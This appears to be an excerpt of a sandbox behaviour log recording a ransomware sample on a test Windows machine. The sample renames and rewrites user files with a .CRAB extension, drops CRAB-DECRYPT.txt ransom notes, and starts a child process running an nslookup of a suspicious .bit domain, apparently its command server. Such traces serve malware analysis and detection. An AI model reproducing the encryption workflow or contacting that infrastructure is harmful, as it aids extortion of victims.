File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 1048576, size_out = 425 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 432 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\AssetCache\NAHQNPMN\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 1048576, size_out = 216 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 224 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 1048576, size_out = 18761 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 18768 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB, size = 1048576, size_out = 17520 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB, size = 17520 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Bg7C4xyzDiCSWMPfDDMQ.m4a.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB, size = 1048576, size_out = 67279 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB, size = 67280 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\CipiNmbyJO4vYR.gif.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB, size = 1048576, size_out = 16381 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB, size = 16384 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\d9DV3J2nXmKKe0ZK.mkv.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB, size = 1048576, size_out = 27764 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB, size = 27776 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\DgxZY 8vmJlYtnH.wav.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB, size = 1048576, size_out = 32281 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB, size = 32288 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\ffti16Pc.wav.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB, size = 1048576, size_out = 31338 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB, size = 31344 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\FGLUwMCYalOqdde5.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB, size = 1048576, size_out = 97712 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB, size = 97712 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\gKX413.xls.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB, size = 1048576, size_out = 29066 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB, size = 29072 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\g_ BvK HrWfCoZC-.mp3.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB, size = 1048576, size_out = 17999 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB, size = 18000 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hfCh.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB, size = 1048576, size_out = 77538 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB, size = 77552 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hNPMPoAayN8a6GPyHRx.jpg.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Identities\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB, size = 1048576, size_out = 5363 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB, size = 5376 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lcdz0cE9CPp4KK7l99.rtf.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB, size = 1048576, size_out = 102135 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB, size = 102144 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\lhX44.flv.CRAB, size = 8 True 1
Fn
For performance reasons, the remaining 4430 entries are omitted.
The remaining entries can be found in glog.xml.
Process #2: nslookup.exe
9 24
»
Information Value
ID #2
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:40, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:03:56
OS Process Information
»
Information Value
PID 0xf24
